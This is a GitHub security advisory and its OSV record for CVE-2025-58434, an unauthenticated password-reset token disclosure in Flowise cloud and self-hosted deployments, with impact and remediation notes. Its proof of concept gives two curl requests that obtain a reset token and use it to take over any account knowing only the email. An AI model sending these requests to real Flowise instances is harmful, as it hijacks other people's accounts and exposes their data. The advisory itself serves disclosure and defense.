GHSA-WGPV-6J63-X5PH

Vulnerability from github – Published: 2025-09-12 20:02 – Updated: 2025-09-15 15:31
VLAI?
Summary
Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover
Details

Summary

The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).

This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.

CVSS v3.1 Base Score: 9.8 (Critical) Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

  • The endpoint /api/v1/account/forgot-password accepts an email address as input.

  • Instead of only sending a reset email, the API responds directly with sensitive user details, including:

  • User ID, name, email, hashed credential, status, timestamps.

  • A valid tempToken and its expiry, which is intended for password reset.
  • This tempToken can then be reused immediately in the /api/v1/account/reset-password endpoint to reset the password of the targeted account without any email verification or user interaction.
  • Exploitation requires only the victim’s email address, which is often guessable or discoverable.
  • Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.

PoC

  1. Request a reset token for the victim
curl -i -X POST https://<target>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>"}}'

Response (201 Created):

{
  "user": {
    "id": "<redacted-uuid>",
    "name": "<redacted>",
    "email": "<victim@example.com>",
    "credential": "<redacted-hash>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}
  1. Use the exposed tempToken to reset the password
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<victim@example.com>",
          "tempToken":"<redacted-tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'

Expected Result: 200 OK The victim’s account password is reset, allowing full login.

Impact

  • Type: Authentication bypass / Insecure direct object exposure.

  • Impact:

  • Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.

  • Applies to both Flowise Cloud and locally hosted/self-managed deployments.
  • Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
  • High likelihood of exploitation since no prior access or user interaction is required.

Recommended Remediation

  • Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
  • Ensure forgot-password responds with a generic success message regardless of input, to avoid user enumeration.
  • Require strong validation of the tempToken (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
  • Apply the same fixes to both cloud and self-hosted/local deployments.
  • Log and monitor password reset requests for suspicious activity.
  • Consider multi-factor verification for sensitive accounts.

Credit

⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).

Severity ?
9.8 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58434"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-12T20:02:40Z",
    "nvd_published_at": "2025-09-12T18:15:34Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete **account takeover (ATO)**.\n\nThis vulnerability applies to **both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments** that expose the same API.\n\n**CVSS v3.1 Base Score:** **9.8 (Critical)**\n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n\n---\n\n### Details\n\n* The endpoint `/api/v1/account/forgot-password` accepts an email address as input.\n* Instead of only sending a reset email, the API **responds directly with sensitive user details**, including:\n\n  * User ID, name, email, hashed credential, status, timestamps.\n  * **A valid `tempToken` and its expiry**, which is intended for password reset.\n* This `tempToken` can then be reused immediately in the `/api/v1/account/reset-password` endpoint to reset the password of the targeted account **without any email verification** or user interaction.\n* Exploitation requires only the victim\u2019s email address, which is often guessable or discoverable.\n* Because the vulnerable endpoints exist in both **Flowise Cloud** and **local/self-hosted deployments**, any exposed instance is vulnerable to account takeover.\n\nThis effectively allows any unauthenticated attacker to **take over arbitrary accounts** (including admin or privileged accounts) by requesting a reset for their email.\n\n---\n\n### PoC\n\n1. **Request a reset token for the victim**\n\n```bash\ncurl -i -X POST https://\u003ctarget\u003e/api/v1/account/forgot-password \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"user\":{\"email\":\"\u003cvictim@example.com\u003e\"}}\u0027\n```\n\n**Response (201 Created):**\n\n```json\n{\n  \"user\": {\n    \"id\": \"\u003credacted-uuid\u003e\",\n    \"name\": \"\u003credacted\u003e\",\n    \"email\": \"\u003cvictim@example.com\u003e\",\n    \"credential\": \"\u003credacted-hash\u003e\",\n    \"tempToken\": \"\u003credacted-tempToken\u003e\",\n    \"tokenExpiry\": \"2025-08-19T13:00:33.834Z\",\n    \"status\": \"active\"\n  }\n}\n```\n\n2. **Use the exposed `tempToken` to reset the password**\n\n```bash\ncurl -i -X POST https://\u003ctarget\u003e/api/v1/account/reset-password \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n        \"user\":{\n          \"email\":\"\u003cvictim@example.com\u003e\",\n          \"tempToken\":\"\u003credacted-tempToken\u003e\",\n          \"password\":\"NewSecurePassword123!\"\n        }\n      }\u0027\n```\n\n**Expected Result:** `200 OK`\nThe victim\u2019s account password is reset, allowing full login.\n\n---\n\n### Impact\n\n* **Type:** Authentication bypass / Insecure direct object exposure.\n* **Impact:**\n\n  * Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.\n  * Applies to **both Flowise Cloud and locally hosted/self-managed deployments**.\n  * Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.\n  * High likelihood of exploitation since no prior access or user interaction is required.\n\n---\n\n### Recommended Remediation\n\n* **Do not return reset tokens** or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.\n* Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration.\n* Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery).\n* Apply the same fixes to **both cloud and self-hosted/local deployments**.\n* Log and monitor password reset requests for suspicious activity.\n* Consider multi-factor verification for sensitive accounts.\n\n\nCredit\n\n---\n\n\u26a0\ufe0f This is a **Critical ATO vulnerability** because it allows attackers to compromise any account with only knowledge of an email address, and it applies to **all deployment models (cloud and local)**.\n\n---",
  "id": "GHSA-wgpv-6j63-x5ph",
  "modified": "2025-09-15T15:31:14Z",
  "published": "2025-09-12T20:02:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.